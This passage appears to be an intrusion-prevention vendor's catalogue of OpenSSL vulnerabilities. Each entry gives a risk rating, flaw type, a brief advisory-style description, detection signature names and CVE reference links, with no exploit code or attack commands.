About this vulnerability: A vulnerability in OpenSSL.
Risk: High
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: OpenSSL
Type: Infinite Loop
Description: A vulnerability exists in OpenSSL versions 1.0.2, 1.1.1 and 3.0 which enables a remote attacker to trigger an infinite loop via a crafted certificate.
Situation: HTTPS_CS-OpenSSL-BN_Mod_sqrt-Infinite-Loop
HTTPS_SS-OpenSSL-BN_Mod_sqrt-Infinite-Loop
References:
CVE-2022-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778
Back to top

OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-854-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Integer Overflow
Description: There exists an integer underflow vulnerability in OpenSSL. A remote attacker can use this to cause a denial of service situation.
Situation: HTTPS_SS-OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow
References:
CVE-2017-3731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3731
Back to top

OpenSSL-ChangeCipher-MITM-Security-Bypass

About this vulnerability: A vulnerability in OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: There is a security bypass vulnerability in OpenSSL. The vulnerability is due to a weakness in OpenSSL methods used for keying material when processing ChangeCipherSpec messages. A remote, unauthenticated, man-in-the-middle attacker could exploit this vulnerability by using a specially crafted handshake to force the use of weak keying material. Successful exploitation would provide an attacker the ability to decrypt traffic and inject plaintext into a TLS connection.
Situation: HTTPS_CS-OpenSSL-ChangeCipher-Before-Key-Exchange
References:
CVE-2014-0224
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
BID-67899
http://www.securityfocus.com/bid/67899
OSVDB-107729
http://www.osvdb.org/107729
Back to top

OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A memory corruption vulnerability exists in OpenSSL library. The vulnerability is due to an error in handling CMS (Cryptographic Message Syntax) structures. If a CMS structure contains a crafted 'OriginatorInfo' value, the vulnerable code could write to an invalid memory location or cause a double-free. Remote attackers could exploit this vulnerability by sending a specially crafted CMS message to the target application using the vulnerable version of the OpenSSL library. Successful exploitation may allow for arbitrary code execution with the privileges of the application using the OpenSSL library.
Situation: Shared_SS-OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
File-Binary_OpenSSL-CMS-Structure-OriginatorInfo-Memory-Corruption
References:
CVE-2010-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0742
BID-40502
http://www.securityfocus.com/bid/40502
Back to top

OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A type confusion vulnerability has been reported in the OpenSSL. The vulnerability is due to improper X.400 address processing inside an X.509 GeneralName. A remote attacker could exploit the vulnerability by sending crafted traffic to the target system. Successful exploitation could result in denial of service or sensitive information disclosure.
Situation: HTTPS_SS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
TLS_CS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
File-Binary_OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
References:
CVE-2023-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286
Back to top

OpenSSL-C_rehash-Script-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1480-5242
Last changed: sgpkg-ips-1480-5242
Platform: Generic
Software: OpenSSL
Type: Input Validation
Description: A command injection vulnerability has been reported in the OpenSSL. The vulnerability is due to improper validation of shell metacharacters. A remote attacker could exploit the vulnerability by enticing the target user to parse malicious files. Successful exploitation could result in command execution within the context of the target user.
Situation: File-Name_OpenSSL-C-rehash-Script-Command-Injection-Vulnerability
References:
CVE-2022-1292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292
Back to top

OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: OpenSSL
Type: Input Validation
Description: A command injection vulnerability has been reported in the OpenSSL. The vulnerability is due to improper validation of shell metacharacters. A remote attacker could exploit the vulnerability by enticing the target user to parse malicious files. Successful exploitation could result in command execution within the context of the target user.
Situation: File-Binary_Suspicious-Long-Name-In-Gnu-Tar-Archive
File-Name_OpenSSL-C_rehash-Script-CVE-2022-2068-Command-Injection-Vulnerability
References:
CVE-2022-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068
Back to top

OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference that occurs when an OpenSSL application receives and processes a Client Certificate and a crafted Client Key Exchange handshake message. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted handshake message to a vulnerable server application. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.
Situation: HTTPS_CS-OpenSSL-Dhe-Client-Key-Exchange-Denial-Of-Service
References:
CVE-2015-1787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1787
BID-73238
http://www.securityfocus.com/bid/73238
Back to top

OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in OpenSSL. The vulnerability is due to memory exhaustion when parsing specially crafted DTLS packets. A remote, unauthenticated attacker can exploit this vulnerability by sending a large number of crafted packets to a vulnerable server. Successful exploitation will result in high memory consumption and lead to a denial of service condition.
Situation: Generic_UDP-OpenSSL-DTLS-Dtls1_Buffer_Record-Denial-Of-Service
References:
CVE-2015-0206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
OSVDB-116791
http://www.osvdb.org/116791
Back to top

OpenSSL-DTLS-Handshake-Double-Free

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a double free error during reassembly of the fragmented DTLS handshake. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted message to a target. Successful exploitation could lead to a denial of service condition.
Situation: Generic_UDP-OpenSSL-DTLS-Handshake-Double-Free
References:
CVE-2014-3505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505
BID-69081
http://www.securityfocus.com/bid/69081
OSVDB-109893
http://www.osvdb.org/109893
Back to top

OpenSSL-DTLS-Handshake-Memory-Exhaustion

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to large memory consumption during reassembly of the fragmented DTLS handshake. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.
Situation: Generic_UDP-OpenSSL-DTLS-Handshake-Memory-Exhaustion
References:
CVE-2014-3506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506
BID-69076
http://www.securityfocus.com/bid/69076
OSVDB-109892
http://www.osvdb.org/109892
Back to top

OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS

About this vulnerability: A OpenSSL DTLS Packet ChangeCipherSpec Remote DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Null Pointer Dereference
Description: A vulnerability in OpenSSL, before 0.9.8i, allows remote attackers to cause a denial of service condition with a NULL pointer dereference via a DTLS ChangeCipherSpec packet sent before a ClientHello.
Situation: Generic_UDP-OpenSSL-DTLS-Packet-ChangeCipherSpec-Remote-DoS
References:
CVE-2009-1386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
BID-35174
http://www.securityfocus.com/bid/35174
OSVDB-55073
http://www.osvdb.org/55073
Back to top

OpenSSL-DTLS-Recursion-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial-of-service vulnerability exists in OpenSSL. The vulnerability is due to the possibility of unbounded recursion in dtls1_get_message_fragment() during the processing of DTLS handshake messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious DTLS handshake to a target. Successful exploitation could lead to a denial-of-service condition.
Situation: Generic_UDP-DTLS-ServerHello-Request
References:
CVE-2014-0221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
BID-67901
http://www.securityfocus.com/bid/67901
OSVDB-107732
http://www.osvdb.org/107732
Back to top

OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A denial-of-service vulnerability exists in OpenSSL. The vulnerability is due to a memory leak in the DTLS SRTP extension parsing code, which is called in both SSL/TLS and DTLS applications regardless of whether the DTLS SRTP extension is used or configured. A remote, unauthenticated attacker can send crafted handshake messages to cause memory leaks, exhaust system memory and create a denial of service condition on an application using the vulnerable library.
Situation: HTTPS_CS-OpenSSL-DTLS-Srtp-Extension-Parsing-Denial-Of-Service
References:
CVE-2014-3513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
BID-70584
http://www.securityfocus.com/bid/70584
OSVDB-113373
http://www.osvdb.org/113373
Back to top

OpenSSL-Dtls1_Process_Out_Of_Seq_Message-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to memory leak in dtls1_process_out_of_seq_message function. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.
Situation: Generic_UDP-OpenSSL-DTLS-Client-Hello-Zero-Fragment-Length
References:
CVE-2014-3507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507
BID-69078
http://www.securityfocus.com/bid/69078
OSVDB-109891
http://www.osvdb.org/109891
Back to top

OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an inconsistency error in the OpenSSL method used for processing DTLS fragments. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious DTLS fragmented message to a target. Successful exploitation could lead to arbitrary code execution in the security context of the affected user.
Situation: Generic_UDP-OpenSSL-Dtls1_Reassemble_Fragment-Invalid-Fragment-Buffer-Overflow
References:
CVE-2014-0195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
BID-67900
http://www.securityfocus.com/bid/67900
OSVDB-107730
http://www.osvdb.org/107730
Back to top

OpenSSL-ECDH-Use-After-Free

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A use-after-free vulnerability has been reported in OpenSSL. The vulnerability is due to an error in processing handshake messages arriving in incorrect order by ephemeral ECDH ciphersuites. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted TLS handshake sequence. A successful attack would result in the execution of arbitrary attacker code in the context of the affected application. If the attack fails, the application may terminate abnormally, resulting in a denial-of-service condition. Applications using OpenSSL may be affected by this vulnerability if the version of OpenSSL they use supports ephemeral ECDH ciphersuites and if these ciphersuites are enabled in the application configuration.
Situation: HTTPS_CS-OpenSSL-ECDH-Use-After-Free
References:
CVE-2011-3210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3210
BID-49471
http://www.securityfocus.com/bid/49471
OSVDB-75230
http://www.osvdb.org/75230
Back to top

OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A resource exhaustion vulnerability exists in OpenSSL. The vulnerability is due to a missing validity check of Elliptic Curve parameters within BN_GF2m_mod_inv(). A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted certificate to a vulnerable OpenSSL client or server application. Successful exploitation will cause the application to enter an infinite loop causing it to consume all CPU resources, resulting in a denial-of-service condition.
Situation: HTTPS_CS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
HTTPS_SS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
References:
CVE-2015-1788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1788
Back to top

OpenSSL-Email-Address-Variable-Length-Buffer-Overflow-CVE-2022-3786

About this vulnerability: A buffer overflow vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Generic
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in OpenSSL versions 3.0.0 to 3.0.6. An attacker can craft a malicious email address in a certificate to overflow an arbitrary number of bytes containing the '.' character (decimal 46) on the stack, resulting in a crash.
Situation: TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF
References:
CVE-2022-3786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3786
Back to top

OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow

About this vulnerability: One byte buffer overflow vulnerability in OpenSSL SSL_get-shared-ciphers function
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: OpenSSL has an off-by-one error in the SSL_get_shared_ciphers function after the fix for the vulnerability CVE-2006-3738. The vulnerability can be triggered in the SSL handshake to overflow a buffer by one byte. A successful exploit may lead to arbitrary code execution or crash the affected server.
Situation: HTTPS_CS-OpenSSL-Get-Shared-Ciphers-Function-Off-By-One-Buffer-Overflow
References:
CVE-2007-5135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135
BID-25831
http://www.securityfocus.com/bid/25831
Back to top

OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference when an OpenSSL application receives and processes a crafted certificate containing invalid RSA PSS parameters. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted client certificate to a vulnerable server application that requests it. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.
Situation: HTTPS_CS-OpenSSL-Invalid-Pss-Parameters-Denial-Of-Service
References:
CVE-2015-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0208
BID-73230
http://www.securityfocus.com/bid/73230
Back to top

OpenSSL-Invalid-SRP-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an unjustified assumption on the size of a number when processing the A parameter used in SRP ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted TLS messages to the target. Successful exploitation could lead to arbitrary code execution in context of the OpenSSL server application.
Situation: HTTPS_CS-OpenSSL-Invalid-SRP-Parameter-A-Buffer-Overflow
References:
CVE-2014-3512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512
BID-69083
http://www.securityfocus.com/bid/69083
OSVDB-109897
http://www.osvdb.org/109897
Back to top

OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in OpenSSL. The vulnerability is due to an unjustified assumption on the size of numbers when processing the g and B parameters used in SRP ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user and sending specially crafted TLS messages to the target application. Successful exploitation could lead to arbitrary code execution in context of the OpenSSL client application.
Situation: HTTPS_SS-OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow
References:
CVE-2014-3512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512
BID-69083
http://www.securityfocus.com/bid/69083
OSVDB-109897
http://www.osvdb.org/109897
Back to top

OpenSSL-Large-Dh-Parameter-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: A denial-of-service vulnerability has been reported in OpenSSL. The vulnerability is due to improper handling of an exceptionally large DH parameter when processing a Server Key Exchange. A remote attacker can exploit this vulnerability by running a malicious server which returns a DH parameter containing a large prime number. Successful exploitation will cause the OpenSSL client, which may be a server application, to use up high CPU resources in computing DH keys using the maliciously crafted DH prime, leading to resource exhaustion.
Situation: HTTPS_SS-OpenSSL-Large-Dh-Parameter-Denial-Of-Service
References:
CVE-2018-0732
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0732
Back to top

OpenSSL-Malformed-Client-Key-Buffer-Overflow

About this vulnerability: Buffer overflow in OpenSSL.
Risk: Critical
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache; OpenSSL
Type: Buffer Overflow
Description: A flaw in OpenSSL can be exploited by sending a malformed client key. This allows executing arbitrary commands on the target host with the privileges of the vulnerable service. The vulnerability affects all applications that use the vulnerable library.
Situation: HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-BOF-BSD
HTTPS_CS-Apache-SSLv2-Malformed-Client-Key-Buffer-Overflow
References:
CVE-2002-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0656
BID-5363
http://www.securityfocus.com/bid/5363
Back to top

OpenSSL-Null-Pointer-Dereference-CVE-2020-1971

About this vulnerability: A vulnerability in OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Platform: Generic
Software: OpenSSL
Type: Input Validation
Description: There is a null pointer dereference vulnerability in OpenSSL. The vulnerability can be triggered when two EDIPartyName elements are compared to each other. A successful exploit would cause OpenSSL to crash, resulting in a denial of service.
Situation: HTTPS_SS-OpenSSL-Null-Pointer-Dereference-CVE-2020-1971
References:
CVE-2020-1971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971
Back to top

OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in the OpenSSL library. The vulnerability is due to delays when processing ASN.1 OBJECT IDENTIFIERs. A remote attacker could exploit the vulnerability by sending crafted packets to an OpenSSL client, or a server that has explicitly enabled client authentication. Successful exploitation could result in denial of service conditions on the affected service.
Situation: File-Binary_OpenSSL-Obj_obj2txt-Object-Identifier-Handling-Denial-Of-Service
References:
CVE-2023-2650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650
Back to top

OpenSSL-RSA-To-EXPORT_RSA-Downgrade-Attack

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OpenSSL
Type: Input Validation
Description: There is a vulnerability in OpenSSL where the OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. This allows a malicious server (MITM) to downgrade the security of a TLS connection and to possibly intercept all following communications. This vulnerability is also known as FREAK.
Situation: TLS_Export-Ciphersuite
References:
CVE-2015-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
Back to top

OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow

About this vulnerability: A vulnerability in OpenSSL.
Risk: High
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A vulnerability in the OpenSSL library, OpenSSL Project OpenSSL prior to 1.1.1l, which allows remote attackers to cause a denial of service condition by sending crafted packets to an application using OpenSSL API for SM2 decryption, due to miscalculation of the outlen parameter used by EVP_PKEY_decrypt when decrypting SM2 encrypted data.
Situation: File-Text_OpenSSL-SM2-Decryption-sm2-Plaintext-Size-Miscalculation-Buffer-Overflow
References:
CVE-2021-3711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711
Back to top

OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference

About this vulnerability: A vulnerability in OpenSSL.
Risk: High
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Platform: Generic
Software: OpenSSL
Type: Null Pointer Dereference
Description: A vulnerability in OpenSSL, versions 1.1.1d, 1.1.1e, and 1.1.1f, which allows remote attackers to cause a denial of service condition by sending crafted packets containing invalid or unrecognized cert signature algorithm during TLS handshake, due to incorrect handling of the "signature_algorithms_cert" TLS extension by SSL_check_chain() during or after TLS handshake.
Situation: TLS_CS-OpenSSL-SSL-Check-Chain-Null-Pointer-Dereference
References:
CVE-2020-1967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1967
Back to top

OpenSSL-SSL3_al_warning-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: There exists a denial of service vulnerability in OpenSSL. A remote attacker can accomplish this by repeatedly sending SSL Alert Warning records during the SSL handshake.
Situation: HTTPS_CS-OpenSSL-SSL3_al_warning-Denial-Of-Service
References:
CVE-2016-8610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610
Back to top

OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A memory corruption vulnerability exists in OpenSSL library. The vulnerability is due to an error in ssl3_get_key_exchange function while handling server key exchange message. If a certificate structure contains a crafted value, the vulnerable code could cause a double-free error. Remote attackers could exploit this vulnerability by enticing the target user to connect to a malicious server using a vulnerable version of the OpenSSL library. Successful exploitation may allow for arbitrary code execution with the privileges of the application using the OpenSSL library.
Situation: Generic_OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
HTTPS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
TLS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
References:
CVE-2010-2939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939
Back to top

OpenSSL-TLS-AES-NI-DoS

About this vulnerability: An OpenSSL TLS AES-NI DoS vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A vulnerability in OpenSSL, version 1.0.1c, which allows remote attackers to cause a denial of service condition, due to not properly computing the length of an encrypted message when used with a TLS version 1.1 or above.
Situation: TLS_CS-OpenSSL-TLS-AES-NI-DoS
References:
CVE-2012-2686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2686
Back to top

OpenSSL-TLS-Connection-Record-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability has been reported in OpenSSL. The flaw is due to an error in the ssl3_get_record() function when handling TLS connections. A remote attacker can exploit this vulnerability by crafting certain records in TLS packets. Successful exploitation would result in the termination of the affected service due to a read attempt at NULL, which leads to a Denial of Service condition.
Situation: TLS_Client-Syntax-Error
References:
CVE-2010-0740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740
Back to top

OpenSSL-TLS-Heartbeat-Vulnerability

About this vulnerability: A vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1705-5242
Platform: Generic
Software: OpenSSL
Type: Input Validation
Description: There is a critical vulnerability in multiple versions of OpenSSL. A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.
Situation: HTTPS_CS-TLS-Heartbeat-Request
HTTPS_SS-TLS-Heartbeat-Response
HTTPS_SS-TLS-Potential-Heartbeat-Response
References:
CVE-2014-0160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
BID-66690
http://www.securityfocus.com/bid/66690
OSVDB-105465
http://www.osvdb.org/105465
Back to top

OpenSSL-TLS-Record-Tampering-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to an error in handling certain TLS records during the handshake process. A remote unauthenticated attacker could exploit this vulnerability by sending tampered records to a vulnerable SSL client (which could be a server application) during the handshake process. Successful exploitation could result in a NULL pointer dereference causing a denial of service condition.
Situation: SMTP_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service
HTTPS_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service
References:
CVE-2013-4353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4353
OSVDB-101843
http://www.osvdb.org/101843
Back to top

OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference

About this vulnerability: A vulnerability in OpenSSL.
Risk: High
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Generic
Software: OpenSSL
Type: Null Pointer Dereference
Description: A vulnerability in OpenSSL, versions 1.1.1 prior to 1.1.1k, which allows remote attackers to cause a denial of service condition by sending crafted packets to an OpenSSL server, due to the improper handling of the renegotiation ClientHello message.
Situation: HTTPS_CS-OpenSSL-TLS-Server-Renegotiation-Null-Pointer-Dereference
References:
CVE-2021-3449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449
Back to top

OpenSSL-Tlsext_Type_status_request-Memory-Leak-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Resource Starvation
Description: There exists a denial of service vulnerability in OpenSSL.
Situation: HTTPS_CS-Large-Number-Of-Renegotiations-In-One-TLS-Connection
References:
CVE-2016-6304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6304
Back to top

OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
